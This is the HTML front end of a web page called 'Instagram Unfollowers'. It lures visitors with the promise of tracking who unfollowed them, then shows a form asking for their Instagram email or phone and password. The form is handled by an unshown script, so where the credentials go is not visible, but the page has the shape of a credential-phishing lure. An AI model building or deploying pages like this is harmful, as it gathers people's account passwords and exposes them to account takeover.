<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram Unfollowers</title>
  <link rel="stylesheet" href="styles.css">
</head>
<body>
  <!-- Home Page Content -->
  <div class="home-container">
    <div class="logo-container">
      <img src="logo.png" alt="Logo" class="logo">
    </div>
  <!-- <p class="message">Ever wondered who unfollowed you on Instagram? Now you can easily track your unfollowers and stay updated with your followers list!</p> -->
   <h3>Ever wondered who unfollowed you on Instagram? </h3>
    <h3>Now you can easily track your unfollowers and stay updated with your followers list!</h3>
    <button class="login-btn" onclick="showLogin()">Continue</button>
  </div>

  <!-- Login Page Content (Initially Hidden) -->
  <div class="login-container" id="loginPage" style="display: none;">
            <img src="logo.png" alt="Logo" class="logo">
    <h1>Enter details</h1>
    <form id="detailsForm">
      <input type="email" id="email" placeholder="Enter email/phone" required />
      <input type="password" id="phone" placeholder="Enter password" required />
      <button type="Login">Check Unfollowers</button>
    </form>
  </div>

  <script src="script.js"></script>
</body>
</html>
